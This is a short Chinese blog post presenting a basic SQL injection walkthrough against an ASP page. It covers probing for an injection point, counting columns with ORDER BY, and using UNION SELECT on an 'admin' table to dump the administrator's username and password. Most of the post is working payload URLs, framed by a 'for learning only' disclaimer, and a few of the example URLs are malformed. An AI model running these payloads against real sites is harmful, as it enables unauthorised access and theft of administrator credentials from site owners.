SQL注入语法 - Kirin博客

SQL注入语法

作者: Bee

全网最全的网络资源分享网站

标签:

漏洞SQL

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

《我是谁—没有绝对安全的系统》
1.判断有无注入点:
http://127.0.0.1/index.asp?id=1 and 1=1
http://127.0.0.1/index.asp?id=1 and 1=2
http://127.0.0.1/index.asp?id=1′

2.猜字段数:
http://127.0.0.1/index.asp?id=1 order by 字段数
例如: http://127.0.0.1/?id=index.asp? order by 11
http://127.0.0.1/?id=index.asp? order by 12
order by 11页面显示正常 order by 12 页面报错所以字段为11

3.暴露管理员用户、密码:
http://127.0.0.1/index.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
1、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字为2和3
2、在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】即可暴露管理员用户名和密码
http://127.0.0.1/index.asp?id=1 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin
3、到此,即可知道管理员用户名:admin和密码:123456

>>>比较老的一种sql注入.大佬勿喷
本文最后更新于2019-6-26,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
分享到:
加入交流群
未经允许不得转载:

作者: Bee, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《SQL注入语法》 发布于2019-6-26

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫